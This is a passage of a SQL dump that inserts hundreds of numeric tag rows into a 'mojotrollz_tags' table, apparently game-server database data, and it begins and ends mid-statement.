(`id`, `table`, `type`, `value`, `comment`) VALUES (180392, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180392, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180393, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180393, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180393, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180393, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180394, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180395, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180396, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180397, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180398, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180399, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180400, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180405, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180406, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180407, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180410, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180411, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180412, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180415, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180417, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180418, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180418, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180421, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180421, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180422, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180422, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180423, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180423, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180424, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180424, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180425, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180426, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180427, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180431, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180435, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180436, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180438, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180439, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180440, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180441, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180442, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180443, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180444, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180448, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180451, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180453, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180454, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180455, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180456, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180461, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180466, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180471, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180472, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180473, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180474, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180475, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180476, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180477, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180478, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180479, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180480, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180497, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180497, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180497, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180497, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180501, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180502, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180503, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180515, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180518, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180523, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180524, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180526, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180526, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180526, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180526, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180529, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180534, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180539, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180544, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180549, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180554, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180559, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180564, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180570, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180573, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180582, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180583, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180598, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180619, 2, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180619, 2, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180619, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180619, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180631, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180631, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180631, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180631, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180632, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180632, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180632, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180632, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180633, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180634, 2, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180634, 2, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180634, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180634, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180635, 2, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180635, 2, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180635, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180635, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180636, 2, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180636, 2, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180636, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180636, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180642, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180651, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180652, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180654, 2, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180654, 2, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180655, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180656, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180657, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180658, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180661, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180662, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180663, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180664, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180666, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180667, 2, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180667, 2, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180667, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180667, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180679, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180680, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180681, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180682, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180683, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180684, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180685, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180690, 2, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180690, 2, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180690, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180690, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180691, 2, 1, 509, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180691, 2, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180691, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180691, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180712, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180715, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180718, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180728, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180745, 2, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180745, 2, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180745, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180745, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180750, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180751, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180752, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180757, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180758, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180759, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180760, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180761, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180762, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180763, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180764, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180765, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180766, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180767, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180768, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180769, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180770, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180771, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180772, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180773, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180774, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180775, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180778, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180788, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180794, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180796, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180797, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180798, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180799, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180812, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180818, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180826, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180832, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180838, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180844, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180866, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180868, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180869, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180871, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180872, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180878, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180898, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180899, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180900, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180901, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180902, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180904, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180913, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180914, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (180915, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181014, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181015, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181016, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181017, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181018, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181019, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181020, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181021, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181022, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181025, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181027, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181029, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181053, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181055, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181056, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181060, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181062, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181063, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181064, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181065, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181066, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181067, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181068, 2, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181068, 2, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181068, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181068, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181069, 2, 1, 531, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181069, 2, 2, 3428, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181069, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181069, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181071, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181071, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181071, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (181071, 2, 